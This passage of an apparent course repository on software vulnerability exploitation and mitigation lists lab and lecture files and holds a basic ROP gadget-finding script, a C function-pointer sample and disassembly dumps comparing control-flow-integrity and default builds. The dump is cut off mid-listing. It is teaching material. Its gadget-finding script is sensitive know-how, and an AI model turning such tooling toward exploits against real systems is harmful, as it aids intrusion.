├── [10]confused_deputy └── lab10.pdf ├── [11]fuzzing ├── lab11.pdf └── nukeland.map ├── [1]disclosure ├── lab1.pdf └── lab1_ARTEM_KALIAHIN.pdf ├── [2]stack_overflow ├── lab2.pdf └── lab2_ARTEM_KALIAHIN.pdf ├── [3]rop_gadgets ├── gadgets.py ├── lab3.pdf └── lab3_ARTEM_KALIAHIN.pdf ├── [4]blind_rop_attack ├── bittau-brop.pdf ├── lab4_ARTEM_KALIAHIN.pdf └── reading4.pdf ├── [5]stuxnet ├── video.pdf └── video5_ARTEM_KALIAHIN.pdf ├── [6]control_flow_integrity ├── cfi.dump ├── code.c ├── default.dump ├── lab6.pdf └── lab6_ARTEM_KALIAHIN.pdf ├── [7]heap_overflow ├── lab7.pdf └── lab7_ARTEM_KALIAHIN.pdf ├── [8]type_confusion_java └── lab8.pdf ├── [9]sql_injection ├── a.out ├── dump.py ├── dump.txt ├── first.txt ├── lab9.pdf ├── lab9_ARTEM_KALIAHIN.pdf ├── second.txt └── test.cpp ├── lecture00 └── lecture00.pdf ├── lecture01 ├── introduction.pdf └── lecture 01 - software vulnerabilities.pdf ├── lecture02 └── stack-overflow.pdf ├── lecture03 ├── DEP-expanded.pdf └── DEP.pdf ├── lecture04 └── aslr.pdf ├── lecture06 └── cfi.pdf ├── lecture07 └── heap-overflow.pdf ├── lecture08 └── type-confusion.pdf ├── lecture09 └── sql-injection.pdf ├── lecture10 └── confused-deputy.pdf ├── lecture11 └── fuzzing.pdf └── project └── Exploitation of a PoC type confusion in C++.pptx /[10]confused_deputy/lab10.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[10]confused_deputy/lab10.pdf -------------------------------------------------------------------------------- /[11]fuzzing/lab11.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[11]fuzzing/lab11.pdf -------------------------------------------------------------------------------- /[11]fuzzing/nukeland.map: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[11]fuzzing/nukeland.map -------------------------------------------------------------------------------- /[1]disclosure/lab1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[1]disclosure/lab1.pdf -------------------------------------------------------------------------------- /[1]disclosure/lab1_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[1]disclosure/lab1_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[2]stack_overflow/lab2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[2]stack_overflow/lab2.pdf -------------------------------------------------------------------------------- /[2]stack_overflow/lab2_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[2]stack_overflow/lab2_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[3]rop_gadgets/gadgets.py: -------------------------------------------------------------------------------- 1 | import sys 2 | from capstone import * 3 | import binascii 4 | 5 | from elftools.elf.constants import SH_FLAGS 6 | from elftools.elf.elffile import ELFFile 7 | from elftools.elf.relocation import RelocationSection 8 | 9 | ############################################################## 10 | # takes a string of arbitrary length and formats it 0x for Capstone 11 | def convertXCS(s): 12 | if len(s) < 2: 13 | print "Input too short!" 14 | return 0 15 | 16 | if len(s) % 2 != 0: 17 | print "Input must be multiple of 2!" 18 | return 0 19 | 20 | conX = '' 21 | 22 | for i in range(0, len(s), 2): 23 | b = s[i:i+2] 24 | b = chr(int(b, 16)) 25 | conX = conX + b 26 | return conX 27 | 28 | 29 | ############################################################## 30 | 31 | 32 | def getHexStreamsFromElfExecutableSections(filename): 33 | print "Processing file:", filename 34 | with open(filename, 'rb') as f: 35 | elffile = ELFFile(f) 36 | 37 | execSections = [] 38 | goodSections = [".text"] #[".interp", ".note.ABI-tag", ".note.gnu.build-id", ".gnu.hash", ".hash", ".dynsym", ".dynstr", ".gnu.version", ".gnu.version_r", ".rela.dyn", ".rela.plt", ".init", ".plt", ".text", ".fini", ".rodata", ".eh_frame_hdr", ".eh_frame"] 39 | checkedSections = [".init", ".plt", ".text", ".fini"] 40 | 41 | for nsec, section in enumerate(elffile.iter_sections()): 42 | 43 | # check if it is an executable section containing instructions 44 | 45 | # good sections we know so far: 46 | #.interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 47 | 48 | if section.name not in goodSections: 49 | continue 50 | 51 | # add new executable section with the following information 52 | # - name 53 | # - address where the section is loaded in memory 54 | # - hexa string of the instructions 55 | name = section.name 56 | addr = section['sh_addr'] 57 | byteStream = section.data() 58 | hexStream = binascii.hexlify(byteStream) 59 | newExecSection = {} 60 | newExecSection['name'] = name 61 | newExecSection['addr'] = addr 62 | newExecSection['hexStream'] = hexStream 63 | execSections.append(newExecSection) 64 | 65 | return execSections 66 | 67 | 68 | if __name__ == '__main__': 69 | if sys.argv[1] == '--test': 70 | 71 | md = Cs(CS_ARCH_X86, CS_MODE_64) 72 | for filename in sys.argv[2:]: 73 | r = getHexStreamsFromElfExecutableSections(filename) 74 | print "Found ", len(r), " executable sections:" 75 | i = 0 76 | for s in r: 77 | print " ", i, ": ", s['name'], "0x", hex(s['addr']), s['hexStream'] 78 | i += 1 79 | 80 | hexdata = s['hexStream'] 81 | gadget = hexdata[0 : 10] 82 | gadget = convertXCS(gadget) 83 | offset = 0 84 | for (address, size, mnemonic, op_str) in md.disasm_lite(gadget, offset): 85 | print ("gadget: %s %s \n") %(mnemonic, op_str) 86 | 87 | 88 | -------------------------------------------------------------------------------- /[3]rop_gadgets/lab3.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[3]rop_gadgets/lab3.pdf -------------------------------------------------------------------------------- /[3]rop_gadgets/lab3_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[3]rop_gadgets/lab3_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[4]blind_rop_attack/bittau-brop.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[4]blind_rop_attack/bittau-brop.pdf -------------------------------------------------------------------------------- /[4]blind_rop_attack/lab4_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[4]blind_rop_attack/lab4_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[4]blind_rop_attack/reading4.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[4]blind_rop_attack/reading4.pdf -------------------------------------------------------------------------------- /[5]stuxnet/video.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[5]stuxnet/video.pdf -------------------------------------------------------------------------------- /[5]stuxnet/video5_ARTEM_KALIAHIN.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/artbom/software-vulnerabilities-exploitation-and-mitigation/8efe40a12f2e19fa8a6a895bef98c982ab89e46e/[5]stuxnet/video5_ARTEM_KALIAHIN.pdf -------------------------------------------------------------------------------- /[6]control_flow_integrity/cfi.dump: -------------------------------------------------------------------------------- 1 | 2 | cfi: file format elf64-x86-64 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 0000000000400370 <_init>: 8 | 400370: 48 83 ec 08 sub $0x8,%rsp 9 | 400374: 48 8b 05 7d 0c 20 00 mov 0x200c7d(%rip),%rax # 600ff8 <__gmon_start__> 10 | 40037b: 48 85 c0 test %rax,%rax 11 | 40037e: 74 02 je 400382 <_init+0x12> 12 | 400380: ff d0 callq *%rax 13 | 400382: 48 83 c4 08 add $0x8,%rsp 14 | 400386: c3 retq 15 | 16 | Disassembly of section .text: 17 | 18 | 0000000000400390 <_start>: 19 | 400390: 31 ed xor %ebp,%ebp 20 | 400392: 49 89 d1 mov %rdx,%r9 21 | 400395: 5e pop %rsi 22 | 400396: 48 89 e2 mov %rsp,%rdx 23 | 400399: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp 24 | 40039d: 50 push %rax 25 | 40039e: 54 push %rsp 26 | 40039f: 49 c7 c0 50 06 40 00 mov $0x400650,%r8 27 | 4003a6: 48 c7 c1 e0 05 40 00 mov $0x4005e0,%rcx 28 | 4003ad: 48 c7 c7 90 05 40 00 mov $0x400590,%rdi 29 | 4003b4: ff 15 36 0c 20 00 callq *0x200c36(%rip) # 600ff0 <__libc_start_main@GLIBC_2.2.5> 30 | 4003ba: f4 hlt 31 | 4003bb: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 32 | 33 | 00000000004003c0 <_dl_relocate_static_pie>: 34 | 4003c0: f3 c3 repz retq 35 | 4003c2: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 36 | 4003c9: 00 00 00 37 | 4003cc: 0f 1f 40 00 nopl 0x0(%rax) 38 | 39 | 00000000004003d0 : 40 | 4003d0: 55 push %rbp 41 | 4003d1: b8 28 10 60 00 mov $0x601028,%eax 42 | 4003d6: 48 3d 28 10 60 00 cmp $0x601028,%rax 43 | 4003dc: 48 89 e5 mov %rsp,%rbp 44 | 4003df: 74 17 je 4003f8 45 | 4003e1: b8 00 00 00 00 mov $0x0,%eax 46 | 4003e6: 48 85 c0 test %rax,%rax 47 | 4003e9: 74 0d je 4003f8 48 | 4003eb: 5d pop %rbp 49 | 4003ec: bf 28 10 60 00 mov $0x601028,%edi 50 | 4003f1: ff e0 jmpq *%rax 51 | 4003f3: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 52 | 4003f8: 5d pop %rbp 53 | 4003f9: c3 retq 54 | 4003fa: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 55 | 56 | 0000000000400400 : 57 | 400400: be 28 10 60 00 mov $0x601028,%esi 58 | 400405: 55 push %rbp 59 | 400406: 48 81 ee 28 10 60 00 sub $0x601028,%rsi 60 | 40040d: 48 89 e5 mov %rsp,%rbp 61 | 400410: 48 c1 fe 03 sar $0x3,%rsi 62 | 400414: 48 89 f0 mov %rsi,%rax 63 | 400417: 48 c1 e8 3f shr $0x3f,%rax 64 | 40041b: 48 01 c6 add %rax,%rsi 65 | 40041e: 48 d1 fe sar %rsi 66 | 400421: 74 15 je 400438 67 | 400423: b8 00 00 00 00 mov $0x0,%eax 68 | 400428: 48 85 c0 test %rax,%rax 69 | 40042b: 74 0b je 400438 70 | 40042d: 5d pop %rbp 71 | 40042e: bf 28 10 60 00 mov $0x601028,%edi 72 | 400433: ff e0 jmpq *%rax 73 | 400435: 0f 1f 00 nopl (%rax) 74 | 400438: 5d pop %rbp 75 | 400439: c3 retq 76 | 40043a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 77 | 78 | 0000000000400440 <__do_global_dtors_aux>: 79 | 400440: 80 3d e1 0b 20 00 00 cmpb $0x0,0x200be1(%rip) # 601028 <__TMC_END__> 80 | 400447: 75 17 jne 400460 <__do_global_dtors_aux+0x20> 81 | 400449: 55 push %rbp 82 | 40044a: 48 89 e5 mov %rsp,%rbp 83 | 40044d: e8 7e ff ff ff callq 4003d0 84 | 400452: c6 05 cf 0b 20 00 01 movb $0x1,0x200bcf(%rip) # 601028 <__TMC_END__> 85 | 400459: 5d pop %rbp 86 | 40045a: c3 retq 87 | 40045b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 88 | 400460: f3 c3 repz retq 89 | 400462: 0f 1f 40 00 nopl 0x0(%rax) 90 | 400466: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 91 | 40046d: 00 00 00 92 | 93 | 0000000000400470 : 94 | 400470: 55 push %rbp 95 | 400471: 48 89 e5 mov %rsp,%rbp 96 | 400474: 5d pop %rbp 97 | 400475: eb 89 jmp 400400 98 | 400477: 90 nop 99 | 400478: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 100 | 40047f: 00 101 | 102 | 0000000000400480 : 103 | 400480: 55 push %rbp 104 | 400481: 48 89 e5 mov %rsp,%rbp 105 | 400484: 89 7d fc mov %edi,-0x4(%rbp) 106 | 400487: 89 75 f8 mov %esi,-0x8(%rbp) 107 | 40048a: 8b 75 fc mov -0x4(%rbp),%esi 108 | 40048d: 3b 75 f8 cmp -0x8(%rbp),%esi 109 | 400490: 0f 9c c0 setl %al 110 | 400493: 24 01 and $0x1,%al 111 | 400495: 0f b6 c0 movzbl %al,%eax 112 | 400498: 5d pop %rbp 113 | 400499: c3 retq 114 | 40049a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 115 | 116 | 00000000004004a0 : 117 | 4004a0: 55 push %rbp 118 | 4004a1: 48 89 e5 mov %rsp,%rbp 119 | 4004a4: 89 7d fc mov %edi,-0x4(%rbp) 120 | 4004a7: 89 75 f8 mov %esi,-0x8(%rbp) 121 | 4004aa: 8b 75 fc mov -0x4(%rbp),%esi 122 | 4004ad: 3b 75 f8 cmp -0x8(%rbp),%esi 123 | 4004b0: 0f 9f c0 setg %al 124 | 4004b3: 24 01 and $0x1,%al 125 | 4004b5: 0f b6 c0 movzbl %al,%eax 126 | 4004b8: 5d pop %rbp 127 | 4004b9: c3 retq 128 | 4004ba: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 129 | 130 | 00000000004004c0 : 131 | 4004c0: 55 push %rbp 132 | 4004c1: 48 89 e5 mov %rsp,%rbp 133 | 4004c4: 48 83 ec 30 sub $0x30,%rsp 134 | 4004c8: 48 b8 d0 05 40 00 00 movabs $0x4005d0,%rax 135 | 4004cf: 00 00 00 136 | 4004d2: 48 89 7d f8 mov %rdi,-0x8(%rbp) 137 | 4004d6: 89 75 f4 mov %esi,-0xc(%rbp) 138 | 4004d9: 48 89 55 e8 mov %rdx,-0x18(%rbp) 139 | 4004dd: 48 8b 55 e8 mov -0x18(%rbp),%rdx 140 | 4004e1: 48 89 d7 mov %rdx,%rdi 141 | 4004e4: 48 29 c7 sub %rax,%rdi 142 | 4004e7: 48 89 f8 mov %rdi,%rax 143 | 4004ea: 48 c1 e8 03 shr $0x3,%rax 144 | 4004ee: 48 c1 e7 3d shl $0x3d,%rdi 145 | 4004f2: 48 09 f8 or %rdi,%rax 146 | 4004f5: 48 83 f8 01 cmp $0x1,%rax 147 | 4004f9: 48 89 55 e0 mov %rdx,-0x20(%rbp) 148 | 4004fd: 76 02 jbe 400501 149 | 4004ff: 0f 0b ud2 150 | 400501: 48 8b 45 f8 mov -0x8(%rbp),%rax 151 | 400505: 48 63 4d f4 movslq -0xc(%rbp),%rcx 152 | 400509: 8b 3c 88 mov (%rax,%rcx,4),%edi 153 | 40050c: 48 8b 45 f8 mov -0x8(%rbp),%rax 154 | 400510: 8b 55 f4 mov -0xc(%rbp),%edx 155 | 400513: 83 c2 01 add $0x1,%edx 156 | 400516: 48 63 ca movslq %edx,%rcx 157 | 400519: 8b 34 88 mov (%rax,%rcx,4),%esi 158 | 40051c: 48 8b 45 e0 mov -0x20(%rbp),%rax 159 | 400520: ff d0 callq *%rax 160 | 400522: 31 d2 xor %edx,%edx 161 | 400524: 89 45 dc mov %eax,-0x24(%rbp) 162 | 400527: 89 d0 mov %edx,%eax 163 | 400529: 48 83 c4 30 add $0x30,%rsp 164 | 40052d: 5d pop %rbp 165 | 40052e: c3 retq 166 | 40052f: 90 nop 167 | 168 | 0000000000400530 : 169 | 400530: 55 push %rbp 170 | 400531: 48 89 e5 mov %rsp,%rbp 171 | 400534: 48 83 ec 20 sub $0x20,%rsp 172 | 400538: 48 b8 d0 05 40 00 00 movabs $0x4005d0,%rax 173 | 40053f: 00 00 00 174 | 400542: 48 89 7d f8 mov %rdi,-0x8(%rbp) 175 | 400546: 48 89 75 f0 mov %rsi,-0x10(%rbp) 176 | 40054a: 89 55 ec mov %edx,-0x14(%rbp) 177 | 40054d: 48 8b 7d f8 mov -0x8(%rbp),%rdi 178 | 400551: 8b 75 ec mov -0x14(%rbp),%esi 179 | 400554: 48 89 c2 mov %rax,%rdx 180 | 400557: e8 64 ff ff ff callq 4004c0 181 | 40055c: 48 ba d8 05 40 00 00 movabs $0x4005d8,%rdx 182 | 400563: 00 00 00 183 | 400566: 48 8b 7d f0 mov -0x10(%rbp),%rdi 184 | 40056a: 8b 75 ec mov -0x14(%rbp),%esi 185 | 40056d: 89 45 e8 mov %eax,-0x18(%rbp) 186 | 400570: e8 4b ff ff ff callq 4004c0 187 | 400575: 31 f6 xor %esi,%esi 188 | 400577: 89 45 e4 mov %eax,-0x1c(%rbp) 189 | 40057a: 89 f0 mov %esi,%eax 190 | 40057c: 48 83 c4 20 add $0x20,%rsp 191 | 400580: 5d pop %rbp 192 | 400581: c3 retq 193 | 400582: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 194 | 400589: 00 00 00 195 | 40058c: 0f 1f 40 00 nopl 0x0(%rax) 196 | 197 | 0000000000400590
: 198 | 400590: 55 push %rbp 199 | 400591: 48 89 e5 mov %rsp,%rbp 200 | 400594: 48 81 ec 80 00 00 00 sub $0x80,%rsp 201 | 40059b: 48 8d 45 90 lea -0x70(%rbp),%rax 202 | 40059f: 48 8d 4d c0 lea -0x40(%rbp),%rcx 203 | 4005a3: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp) 204 | 4005aa: 89 7d f8 mov %edi,-0x8(%rbp) 205 | 4005ad: 48 89 75 f0 mov %rsi,-0x10(%rbp) 206 | 4005b1: 8b 55 f8 mov -0x8(%rbp),%edx 207 | 4005b4: 48 89 cf mov %rcx,%rdi 208 | 4005b7: 48 89 c6 mov %rax,%rsi 209 | 4005ba: e8 71 ff ff ff callq 400530 210 | 4005bf: 31 d2 xor %edx,%edx 211 | 4005c1: 89 45 8c mov %eax,-0x74(%rbp) 212 | 4005c4: 89 d0 mov %edx,%eax 213 | 4005c6: 48 81 c4 80 00 00 00 add $0x80,%rsp 214 | 4005cd: 5d pop %rbp 215 | 4005ce: c3 retq 216 | 4005cf: 90 nop 217 | 218 | 00000000004005d0 : 219 | 4005d0: e9 ab fe ff ff jmpq 400480 220 | 4005d5: cc int3 221 | 4005d6: cc int3 222 | 4005d7: cc int3 223 | 224 | 00000000004005d8 : 225 | 4005d8: e9 c3 fe ff ff jmpq 4004a0 226 | 4005dd: cc int3 227 | 4005de: cc int3 228 | 4005df: cc int3 229 | 230 | 00000000004005e0 <__libc_csu_init>: 231 | 4005e0: 41 57 push %r15 232 | 4005e2: 41 56 push %r14 233 | 4005e4: 49 89 d7 mov %rdx,%r15 234 | 4005e7: 41 55 push %r13 235 | 4005e9: 41 54 push %r12 236 | 4005eb: 4c 8d 25 5e 08 20 00 lea 0x20085e(%rip),%r12 # 600e50 <__frame_dummy_init_array_entry> 237 | 4005f2: 55 push %rbp 238 | 4005f3: 48 8d 2d 5e 08 20 00 lea 0x20085e(%rip),%rbp # 600e58 <__init_array_end> 239 | 4005fa: 53 push %rbx 240 | 4005fb: 41 89 fd mov %edi,%r13d 241 | 4005fe: 49 89 f6 mov %rsi,%r14 242 | 400601: 4c 29 e5 sub %r12,%rbp 243 | 400604: 48 83 ec 08 sub $0x8,%rsp 244 | 400608: 48 c1 fd 03 sar $0x3,%rbp 245 | 40060c: e8 5f fd ff ff callq 400370 <_init> 246 | 400611: 48 85 ed test %rbp,%rbp 247 | 400614: 74 20 je 400636 <__libc_csu_init+0x56> 248 | 400616: 31 db xor %ebx,%ebx 249 | 400618: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1) 250 | 40061f: 00 251 | 400620: 4c 89 fa mov %r15,%rdx 252 | 400623: 4c 89 f6 mov %r14,%rsi 253 | 400626: 44 89 ef mov %r13d,%edi 254 | 400629: 41 ff 14 dc callq *(%r12,%rbx,8) 255 | 40062d: 48 83 c3 01 add $0x1,%rbx 256 | 400631: 48 39 dd cmp %rbx,%rbp 257 | 400634: 75 ea jne 400620 <__libc_csu_init+0x40> 258 | 400636: 48 83 c4 08 add $0x8,%rsp 259 | 40063a: 5b pop %rbx 260 | 40063b: 5d pop %rbp 261 | 40063c: 41 5c pop %r12 262 | 40063e: 41 5d pop %r13 263 | 400640: 41 5e pop %r14 264 | 400642: 41 5f pop %r15 265 | 400644: c3 retq 266 | 400645: 90 nop 267 | 400646: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 268 | 40064d: 00 00 00 269 | 270 | 0000000000400650 <__libc_csu_fini>: 271 | 400650: f3 c3 repz retq 272 | 273 | Disassembly of section .fini: 274 | 275 | 0000000000400654 <_fini>: 276 | 400654: 48 83 ec 08 sub $0x8,%rsp 277 | 400658: 48 83 c4 08 add $0x8,%rsp 278 | 40065c: c3 retq 279 | -------------------------------------------------------------------------------- /[6]control_flow_integrity/code.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int lt(int x, int y) { 5 | return x < y; 6 | } 7 | int gt(int x, int y) { 8 | return x > y; 9 | } 10 | 11 | int sort(int a[], int len, int (*f)(int, int)) { 12 | (*f)(a[len], a[len+1]); 13 | return 0; 14 | } 15 | 16 | int sort2(int a[ ], int b[ ], int len) { 17 | sort( a, len, < ); 18 | sort( b, len, > ); 19 | return 0; 20 | } 21 | 22 | int main(int argc, char** argv) { 23 | int ia[10]; 24 | int ib[10]; 25 | sort2(ia, ib, argc); 26 | return 0; 27 | } -------------------------------------------------------------------------------- /[6]control_flow_integrity/default.dump: -------------------------------------------------------------------------------- 1 | 2 | default: file format elf64-x86-64 3 | 4 | 5 | Disassembly of section .init: 6 | 7 | 0000000000400370 <_init>: 8 | 400370: 48 83 ec 08 sub $0x8,%rsp 9 | 400374: 48 8b 05 7d 0c 20 00 mov 0x200c7d(%rip),%rax # 600ff8 <__gmon_start__> 10 | 40037b: 48 85 c0 test %rax,%rax 11 | 40037e: 74 02 je 400382 <_init+0x12> 12 | 400380: ff d0 callq *%rax 13 | 400382: 48 83 c4 08 add $0x8,%rsp 14 | 400386: c3 retq 15 | 16 | Disassembly of section .text: 17 | 18 | 0000000000400390 <_start>: 19 | 400390: 31 ed xor %ebp,%ebp 20 | 400392: 49 89 d1 mov %rdx,%r9 21 | 400395: 5e pop %rsi 22 | 400396: 48 89 e2 mov %rsp,%rdx 23 | 400399: 48 83 e4 f0 and $0xfffffffffffffff0,%rsp 24 | 40039d: 50 push %rax 25 | 40039e: 54 push %rsp 26 | 40039f: 49 c7 c0 20 06 40 00 mov $0x400620,%r8 27 | 4003a6: 48 c7 c1 b0 05 40 00 mov $0x4005b0,%rcx 28 | 4003ad: 48 c7 c7 70 05 40 00 mov $0x400570,%rdi 29 | 4003b4: ff 15 36 0c 20 00 callq *0x200c36(%rip) # 600ff0 <__libc_start_main@GLIBC_2.2.5> 30 | 4003ba: f4 hlt 31 | 4003bb: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 32 | 33 | 00000000004003c0 <_dl_relocate_static_pie>: 34 | 4003c0: f3 c3 repz retq 35 | 4003c2: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 36 | 4003c9: 00 00 00 37 | 4003cc: 0f 1f 40 00 nopl 0x0(%rax) 38 | 39 | 00000000004003d0 : 40 | 4003d0: 55 push %rbp 41 | 4003d1: b8 28 10 60 00 mov $0x601028,%eax 42 | 4003d6: 48 3d 28 10 60 00 cmp $0x601028,%rax 43 | 4003dc: 48 89 e5 mov %rsp,%rbp 44 | 4003df: 74 17 je 4003f8 45 | 4003e1: b8 00 00 00 00 mov $0x0,%eax 46 | 4003e6: 48 85 c0 test %rax,%rax 47 | 4003e9: 74 0d je 4003f8 48 | 4003eb: 5d pop %rbp 49 | 4003ec: bf 28 10 60 00 mov $0x601028,%edi 50 | 4003f1: ff e0 jmpq *%rax 51 | 4003f3: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 52 | 4003f8: 5d pop %rbp 53 | 4003f9: c3 retq 54 | 4003fa: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 55 | 56 | 0000000000400400 : 57 | 400400: be 28 10 60 00 mov $0x601028,%esi 58 | 400405: 55 push %rbp 59 | 400406: 48 81 ee 28 10 60 00 sub $0x601028,%rsi 60 | 40040d: 48 89 e5 mov %rsp,%rbp 61 | 400410: 48 c1 fe 03 sar $0x3,%rsi 62 | 400414: 48 89 f0 mov %rsi,%rax 63 | 400417: 48 c1 e8 3f shr $0x3f,%rax 64 | 40041b: 48 01 c6 add %rax,%rsi 65 | 40041e: 48 d1 fe sar %rsi 66 | 400421: 74 15 je 400438 67 | 400423: b8 00 00 00 00 mov $0x0,%eax 68 | 400428: 48 85 c0 test %rax,%rax 69 | 40042b: 74 0b je 400438 70 | 40042d: 5d pop %rbp 71 | 40042e: bf 28 10 60 00 mov $0x601028,%edi 72 | 400433: ff e0 jmpq *%rax 73 | 400435: 0f 1f 00 nopl (%rax) 74 | 400438: 5d pop %rbp 75 | 400439: c3 retq 76 | 40043a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 77 | 78 | 0000000000400440 <__do_global_dtors_aux>: 79 | 400440: 80 3d e1 0b 20 00 00 cmpb $0x0,0x200be1(%rip) # 601028 <__TMC_END__> 80 | 400447: 75 17 jne 400460 <__do_global_dtors_aux+0x20> 81 | 400449: 55 push %rbp 82 | 40044a: 48 89 e5 mov %rsp,%rbp 83 | 40044d: e8 7e ff ff ff callq 4003d0 84 | 400452: c6 05 cf 0b 20 00 01 movb $0x1,0x200bcf(%rip) # 601028 <__TMC_END__> 85 | 400459: 5d pop %rbp 86 | 40045a: c3 retq 87 | 40045b: 0f 1f 44 00 00 nopl 0x0(%rax,%rax,1) 88 | 400460: f3 c3 repz retq 89 | 400462: 0f 1f 40 00 nopl 0x0(%rax) 90 | 400466: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1) 91 | 40046d: 00 00 00 92 | 93 | 0000000000400470 : 94 | 400470: 55 push %rbp 95 | 400471: 48 89 e5 mov %rsp,%rbp 96 | 400474: 5d pop %rbp 97 | 400475: eb 89 jmp 400400 98 | 400477: 66 0f 1f 84 00 00 00 nopw 0x0(%rax,%rax,1) 99 | 40047e: 00 00 100 | 101 | 0000000000400480 : 102 | 400480: 55 push %rbp 103 | 400481: 48 89 e5 mov %rsp,%rbp 104 | 400484: 89 7d fc mov %edi,-0x4(%rbp) 105 | 400487: 89 75 f8 mov %esi,-0x8(%rbp) 106 | 40048a: 8b 75 fc mov -0x4(%rbp),%esi 107 | 40048d: 3b 75 f8 cmp -0x8(%rbp),%esi 108 | 400490: 0f 9c c0 setl %al 109 | 400493: 24 01 and $0x1,%al 110 | 400495: 0f b6 c0 movzbl %al,%eax 111 | 400498: 5d pop %rbp 112 | 400499: c3 retq 113 | 40049a: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 114 | 115 | 00000000004004a0 : 116 | 4004a0: 55 push %rbp 117 | 4004a1: 48 89 e5 mov %rsp,%rbp 118 | 4004a4: 89 7d fc mov %edi,-0x4(%rbp) 119 | 4004a7: 89 75 f8 mov %esi,-0x8(%rbp) 120 | 4004aa: 8b 75 fc mov -0x4(%rbp),%esi 121 | 4004ad: 3b 75 f8 cmp -0x8(%rbp),%esi 122 | 4004b0: 0f 9f c0 setg %al 123 | 4004b3: 24 01 and $0x1,%al 124 | 4004b5: 0f b6 c0 movzbl %al,%eax 125 | 4004b8: 5d pop %rbp 126 | 4004b9: c3 retq 127 | 4004ba: 66 0f 1f 44 00 00 nopw 0x0(%rax,%rax,1) 128 | 129 | 00000000004004c0 : 130 | 4004c0: 55 push %rbp 131 | 4004c1: 48 89 e5 mov %rsp,%rbp 132 | 4004c4: 48 83 ec 20 sub $0x20,%rsp 133 | 4004c8: 48 89 7d f8 mov %rdi,-0x8(%rbp) 134 | 4004cc: 89 75 f4 mov %esi,-0xc(%rbp) 135 | 4004cf: 48 89 55 e8 mov %rdx,-0x18(%rbp) 136 | 4004d3: 48 8b 55 e8 mov -0x18(%rbp),%rdx 137 | 4004d7: 48 8b 7d f8 mov -0x8(%rbp),%rdi 138 | 4004db: 48 63 45 f4 movslq -0xc(%rbp),%rax 139 | 4004df: 8b 3c 87 mov (%rdi,%rax,4),%edi 140 | 4004e2: 48 8b 45 f8 mov -0x8(%rbp),%rax 141 | 4004e6: 8b 75 f4 mov -0xc(%rbp),%esi 142 | 4004e9: 83 c6 01 add $0x1,%esi 143 | 4004ec: 48 63 ce movslq %esi,%rcx 144 | 